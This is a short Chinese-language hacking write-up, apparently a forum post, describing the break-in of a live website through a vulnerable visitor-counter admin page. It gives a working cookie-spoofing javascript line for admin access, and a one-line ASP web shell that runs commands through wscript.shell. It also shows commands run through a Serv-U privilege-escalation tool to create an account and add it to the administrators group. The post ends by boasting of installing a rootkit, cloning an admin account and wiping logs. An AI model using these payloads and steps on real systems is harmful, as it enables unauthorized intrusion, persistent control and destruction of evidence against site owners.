DB_OWNER权限,SQL Server禁止多句执行(偶就不能通过WEB方式备份得到shell了),开了3389(冲着它来的) 后台没什么功能,想放弃,可发现了下面的一幕 发现了一个计数器程序的readme http://www.abc.com/count/readme.txt 有说明就好办,从网上下了个源程序来 发现漏洞文件count/admin.asp代码如下 _____________________________________________________________ <% '****************************** ' ' 飞越访客单用户统计系统 ' 飞越 feiyueziwo@sohu.com ' www.pwsite.net ' ' 版权所有: 动力在线 ' '****************************** %> <% response.write Request.Cookies(feiyue)("Username") if Request.Cookies(feiyue)("Username")="" then response.end response.Redirect("login.asp?action=error") end if%> ........... _____________________________________________________________ cookies欺骗一句话就可以搞定 再IE里输入以下代码,再访问http://www.abc.com/count/admin.asp就是管理员了 javascript:document.cookie="feiyue=Username=cooldiyer"; 后台没什么可利用,郁闷,数据库插马本机测试可以成功,可它网站的不行,压缩了数据库还不行, 后台不能上传文件,只一个备份数据库功能,利用这个功能把数据库连接文件给显示了出来,得到 SQL Server连接用户和密码,远程连接后备份数据库log得到一个shell 主机开了Serv-U 6.2,上传Serv-U本地提权工具ftp.exe 写了一句话木马如下: <%=Server.CreateObject("wscript.shell").exec(request("cmd")).stdout.readall%> 执行: http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net user cooldiyer /add" http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net localgroup administrators cooldiyer /add" 成功!连其3389端口,安上rootkit,CA一个管理员,CleanLog,闪人.......